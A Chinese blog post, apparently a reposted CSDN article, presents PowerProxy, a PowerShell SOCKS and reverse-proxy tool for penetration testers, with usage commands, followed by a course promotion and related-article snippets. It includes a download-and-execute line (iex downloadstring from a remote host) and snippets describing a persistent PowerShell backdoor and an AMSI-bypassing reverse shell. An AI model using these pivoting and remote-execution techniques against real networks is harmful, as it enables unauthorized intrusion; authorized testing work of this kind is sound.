PowerProxy:一款带有反向代理功能的PowerShell Socks代理工具

最新推荐文章于 2025-03-11 12:06:21 发布
最新推荐文章于 2025-03-11 12:06:21 发布
阅读量859 收藏
点赞数
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/text202202/article/details/128954160
版权

关于PowerProxy

PowerProxy是一款功能强大的PowerShell
Socks代理工具,该工具带有反向代理功能,可以帮助广大安全研究人员更加轻松地完成某些特定场景下的渗透测试任务。

PowerProxy专为渗透测试人员设计,在遍历阻止入站连接的网络时,反向代理功能肯定是要优先考虑的。在默认情况下,反向代理连接会经过加密处理,而Socks5连接也支持基于用户名和密码的身份验证。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/get-get-get-get/PowerProxy.git

工具配置

我们可以使用下列命令导入PowerProxy脚本:

iex (new-object net.webclient).downloadstring("http://192.168.0.22/PowerProxy.ps1")

或者:

Import-Module \\192.168.0.22\Public\PowerProxy.ps1

其中,reverse_proxy_handler.py能够创建临时SSL证书,此功能需要使用到OpenSSL。如果你的设备上没有安装OpenSSL的话,这需要使用你自己的证书,或者使用“–no-
encrypt”选项,不过大多数Linux或类Unix系统默认都会安装有OpenSSL。

工具使用

查看工具帮助信息

./reverse_proxy_handler.py --help

运行一个反向代理

在本地设备上,使用下列命令开启一个Handler,此时Handler将会监听端口8080上的反向代理,客户端默认将连接至端口1080:

./reverse_proxy_handler.py -p 8080

接下来,在PowerShell窗口中,运行下列命令:

Start-ReverseSocksProxy 172.1.1.20 -Port 8080

代理客户端此时会将reverse_proxy_handler.py脚本创建的服务器当作实际的Socks服务器对待:

curl --socks4 127.0.0.1:1080 http://10.10.2.69/

运行一台传统意义上的Socks服务器

Start-SocksProxy 172.10.2.20 -Port 9050

开启身份验证

我们可以使用PSCredential对象来要求用户在连接时提供正确的用户名和密码:

# 创建凭证

$Password = ConvertTo-SecureString -AsPlaintext -Force "Passw0rd123"

$Cred = New-Object System.Management.Automation.PSCredential ("ProxyUser", $Password)

 

Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose

工具限制

1、仅支持CONNECT请求;

2、不支持GSSAPI认证;

3、reverse_proxy_handler.py仅在类Unix系统上进行过测试,不确定是否支持Windows系统;

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享

反向代理工具nginx
05-11
nginx反向代理工具,也可以做负载均衡,此工具非常有用。
基于powershellsocks代理
weixin_30802171的博客
04-19 565
0x01 前言 在实战中,内网的代理尤其重要,而常见的端口转发被反病毒软件已经盯死,那么学习使用基于powershell的渗透脚本进行代理、端口转发的非常有必要的。 0x02 使用 介绍ithub: https://raw.githubusercontent.com/p3nt4/Invoke-SocksProxy/master/Invoke-SocksProxy.psm1 ...
专业级反向代理工具Nginx Proxy Manager详细配置与远程访问方案
最新发布
m0_59281987的博客
03-11 1795
小伙伴们,是不是每次看到复杂的Nginx和Let’s Encrypt配置就头疼不已?别担心,今天给大家带来一款神器——!这款工具简直是新手小白的救星,不仅界面简洁友好,操作起来也是轻松愉快。有了它,反向代理和SSL证书管理再也不是难题,让我们一起踏上高效、安全的网络管理之旅吧!
RSOCKS一款强大的反向代理服务器工具
gitblog_00070的博客
08-31 1054
RSOCKS一款强大的反向代理服务器工具 rsocksA SOCKS 4/5 reverse proxy server项目地址:https://gitcode.com/gh_mirrors/rs/rsocks 项目介绍 RSOCKS 是一个专为特定主机设计的反向代理服务器,旨在通过 SOCSK4/5 代理传输流量。这一工具对于那些本身不支持 SOCSK4/5 代理的应用程序尤其有用,它简化了在...
mybatis反向代理工具
11-01
mybatis反向代理工具,亲测可用。
开源反向代理工具-Nginx
fzw1030的博客
09-10 1479
NGINX 是一种高性能的反向代理服务器、负载均衡器和 HTTP 缓存服务器。它的设计初衷是为了应对高并发和低资源消耗,尤其适合处理大量的短连接请求。NGINX 的高效性能来自其事件驱动架构和异步非阻塞的处理方式。
基于PowershellSocks 4-5代理(第五十四课)1
08-03
介绍github:Create a Socks 4/5 proxy on port 1234:Create a simple tcp port forward:
Powershell小技巧之设置IE代理
01-20
IE的代理设置位于注册表中:”HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings”下。关键键值为ProxyEnable和ProxyServer。所以通过更改注册表即可完成IE代理的设置。 Function Set-IEProxy { ...
HTTP-revshell:使用HTTPS协议与AMSI旁路和代理感知的Powershell反向外壳
03-19
Powershell HTTP / S反向Shell HTTP-revshell是专注于Redteam练习和渗透测试者的工具。该工具通过http / s协议提供反向连接。它使用隐蔽渠道通过Web请求来控制受害机器,从而逃避了IDS,IPS和AV等解决方案。 帮助...
ReversePowershell:向客户端打开反向 PowerShell 终端。 Shell 通过 TCP 接收命令
06-11
install.bat下载client.ps1脚本(托管在您选择的位置)并执行它,从而安装一个持久的 PowerShell 后门。 攻击者运行server.ps1并向受害者获取反向 PowerShell 提示。 用法 在某处托管 client.ps1 在 client.ps1 ...
基于PowershellSocks 4-5代理(第五十四课).docx
09-15
基于PowershellSocks 4-5代理(第五十四课).docx
JRebel反向代理工具window版
09-07
JRebel反向代理工具window版
nginx 反向代理软件
11-24
/conf ---> nginx.conf文件中, 加入代码: include local.windons.com.conf。 local.windons.com.conf该文件为具体反向代理配置文件, 文件名随便起, 内容: server { listen 80; root /; server_name local.windons.com; -----> 代理目标地址, 需要在HOSTS文件中与之匹配。 #location ~ /(public|template) { # proxy_pass_header Server; # proxy_set_header Host $http_host; # proxy_set_header X-Real-IP $remote_addr; # proxy_set_header X-Scheme $scheme; # proxy_pass http://192.168.2.37; #} location / { proxy_pass_header Server; proxy_set_header Host $http_host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Scheme $scheme; proxy_pass http://127.0.0.1:8081; -----> 配置代理的IP级端口 } } /contrib /docs /html /logs ---> 查看日志 /temp nginx.exe run.bat ---> 双击运行
HTTP反向代理、负载均衡软件Traefik.zip
07-19
Træfɪk 是一个新型的http反向代理、负载均衡软件,能轻易的部署微服务. 它支持多种后端 (Docker, Swarm, Mesos/Marathon, Consul, Etcd, Zookeeper, BoltDB, Rest API, file...) ,可以对配置进行自动化、动态的管理. 标签:Traefik
sock5 代理服务器工具
03-27
Linux and FreeBSD 下的 sock5 工具
高性能反向代理软件HAProxy(二)之应用举例
weixin_34353714的博客
09-15 270
一、准备反向代理环境1、环境介绍2、同步时间[root@proxy~]#ntpdate202.120.2.101 [root@node1~]#ntpdate202.120.2.101 [root@node2~]#ntpdate202.120.2.1013、node1、node2节点安装启动httpd并提供测试页[root@node1~]#rpm-q...
运维 | Nginx Proxy Manager 反向代理工具
精品推荐,你我共享
09-30 1487
Nginx Proxy Manager(以下简称 NPM)就是一个 Nginx 的代理管理器,它最大的特点是简单方便。即使是没有 Nginx 基础的小伙伴,也能轻松地用它来完成反向代理的操作,不需要自己写复杂的nginx配置,而且因为自带面板,操作极其简单。Nginx Proxy Manager 后台还可以一键申请 SSL 证书,并且会自动续期,方便省心。官方网站:https://nginxproxymanager.com/
推荐一款新式开源的反向代理工具(FRP)
liulilittle的博客
08-31 2159
打开本地客户端配置环境接入反代服务器上网,一直放油管4K/60FPS,拉一拉 speedtest.net,惊喜来了,油管放到放到没几秒就没了,或者一直评论/视频列表/图片加载不出来,因为反代炸了!2、据测试,50% UDP极高丢包率、20~25% TCP无法连接、3.9% TCP已连接载荷数据发生错误。本文推荐的新的FRP反向代理程序由 C/C++ 新的构建,参考下面的文章来配置程序。准备两台,无 “特殊原因” 干扰环境的服务器,可以是国内或海外服务器。如何快速测试,验证上面的问题?...
如何给powershell配置代理
PanJason的博客
10-30 7453
原因 在参加SC20比赛之前,需要先熟悉CycleCloud的相关概念和配置方法。相关概念已经在前一篇博文中大致翻译过了,具体不清楚的还可以去看Azure CycleCloud的文档。现在重点关注如何配置。由于CycleCloud的web GUI提供的功能是有限的,更多功能的实现需要通过命令行工具CycleCloud CLI完成。然而比赛提供的CycleCloud URL需要代理才能访问,在使用CLI之前又必须完成CycleCloud账户的配置,因此这使我需要为powershell配置代理。 方法 用管理员
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值